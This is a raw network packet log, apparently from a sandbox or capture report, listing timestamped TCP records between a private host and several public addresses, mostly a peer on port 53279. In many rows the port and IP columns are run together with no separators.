                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395680904 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395692110 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395700932 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395710945 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395720959 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395730019 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395740032 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395961046 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395976067 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396001101 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396013021 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396023989 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396034002 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396043062 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396053076 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396063089 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.396296978 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.600991964 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601259947 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601274014 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601284027 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601294041 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601304054 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601314068 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601324081 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601334095 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601342916 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601352930 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601361990 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601372957 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601382971 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601392984 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601402998 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601412058 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601422071 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601432085 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601466894 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601692915 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601706028 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601716042 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601726055 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601735115 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601744890 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601753950 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601763964 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601773024 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.601782084 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.821185112 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.835912943 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.835999012 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836097002 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836122036 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836132050 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836142063 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836152077 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836162090 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836172104 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836183071 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836193085 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836203098 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836213112 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836304903 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836427927 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836441040 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836451054 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836461067 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836487055 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836497068 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836507082 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836517096 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836527109 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836536884 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836546898 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836556911 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836566925 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836575985 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836585999 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836591005 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836596012 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836606979 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836616993 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836627960 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836637020 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836647034 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836735964 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836803913 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836807013 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836807966 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836807966 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836808920 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836808920 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836810112 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836810112 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836811066 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836811066 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836812019 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.837363958 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.837363958 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.837363958 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841154099 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841267109 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841289043 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841300011 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841310978 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841320992 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.842057943 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.853431940 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039284945 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039305925 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039506912 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039555073 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039587021 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039602041 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039633989 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039649010 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039676905 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039691925 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039705992 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039733887 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039747953 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039778948 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039794922 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039809942 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039810896 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039838076 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039853096 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039881945 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039896965 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039911985 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039940119 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039961100 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040010929 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040031910 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040045977 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040060043 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040075064 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040088892 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040102959 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040117979 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040132046 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040146112 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040160894 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040174961 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040186882 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040189981 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040205002 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040220022 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040234089 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040247917 CET532794977087.120.114.20192.168.11.20
Nov 11, 2024 08:10:59.040261984 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040277004 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040280104 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:10:59.040291071 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040307045 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040328026 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040342093 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040355921 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040383101 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040397882 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040426016 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040441036 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040455103 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040482998 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040498018 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040514946 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040544033 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040559053 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040585995 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040608883 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040643930 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040658951 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040685892 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040700912 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040715933 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040730953 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040745020 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040760040 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040775061 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040788889 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040803909 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040817976 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040832996 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040839911 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:10:59.040839911 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:10:59.040839911 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:10:59.040847063 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040862083 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040865898 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:10:59.040875912 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040890932 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040904999 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040910959 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:10:59.040919065 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040934086 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.040945053 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:10:59.041094065 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:10:59.041218042 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:10:59.060718060 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:11:01.352480888 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:11:01.352503061 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:11:01.352579117 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:11:01.570961952 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:11:01.571229935 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:11:01.571403027 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:11:01.791894913 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:11:01.802803993 CET  53279  49770  87.120.114.20    192.168.11.20
Nov 11, 2024 08:11:01.802953959 CET  49770  53279  192.168.11.20    87.120.114.20
Nov 11, 2024 08:11:04.194210052 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.194230080 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.194468021 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.194668055 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.194679976 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.352240086 CET  49764    443  192.168.11.20    23.1.33.206
Nov 11, 2024 08:11:04.688816071 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.690459013 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.690469980 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.691768885 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.692106009 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.693722963 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.693819046 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.693859100 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.736670971 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.736680984 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.783509970 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.892946959 CET  49763     80  192.168.11.20    64.233.176.94
Nov 11, 2024 08:11:04.892982960 CET  49765     80  192.168.11.20    199.232.214.172
Nov 11, 2024 08:11:04.893002033 CET  49766     80  192.168.11.20    199.232.214.172
Nov 11, 2024 08:11:04.924623966 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.924716949 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.924813032 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.924860954 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.924900055 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.924990892 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.925046921 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.925250053 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.933243036 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.943783045 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.943974972 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:04.943990946 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:04.988933086 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.011332989 CET     80  49765  199.232.214.172  192.168.11.20
Nov 11, 2024 08:11:05.011347055 CET     80  49765  199.232.214.172  192.168.11.20
Nov 11, 2024 08:11:05.011356115 CET     80  49766  199.232.214.172  192.168.11.20
Nov 11, 2024 08:11:05.011365891 CET     80  49766  199.232.214.172  192.168.11.20
Nov 11, 2024 08:11:05.011374950 CET     80  49763  64.233.176.94    192.168.11.20
Nov 11, 2024 08:11:05.011483908 CET  49765     80  192.168.11.20    199.232.214.172
Nov 11, 2024 08:11:05.011513948 CET  49766     80  192.168.11.20    199.232.214.172
Nov 11, 2024 08:11:05.011749983 CET  49763     80  192.168.11.20    64.233.176.94
Nov 11, 2024 08:11:05.045631886 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.049679041 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.049705029 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.050012112 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.050026894 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.050204992 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.056277037 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.066193104 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.066236973 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.066586018 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.066603899 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.066900015 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.073178053 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.081578016 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.081604004 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.081809044 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.081828117 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.082016945 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.090131998 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.098432064 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.098469019 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.098670006 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.098689079 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.098892927 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.106827021 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.115437031 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.115458965 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.115652084 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.115664005 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.115865946 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.123569012 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.131928921 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.131952047 CET    443  49781  172.217.215.132  192.168.11.20
Nov 11, 2024 08:11:05.132213116 CET  49781    443  192.168.11.20    172.217.215.132
Nov 11, 2024 08:11:05.132224083 CET    443  49781  172.217.215.132  192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.132390022 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.163996935 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.167937040 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.167968035 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.168200016 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.168207884 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.168418884 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.175430059 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.182670116 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.182760000 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.183015108 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.183058977 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.183305025 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.189135075 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.195924044 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.196052074 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.196129084 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.196176052 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.196424007 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.202553988 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.208743095 CET44349781172.217.215.132192.168.11.20
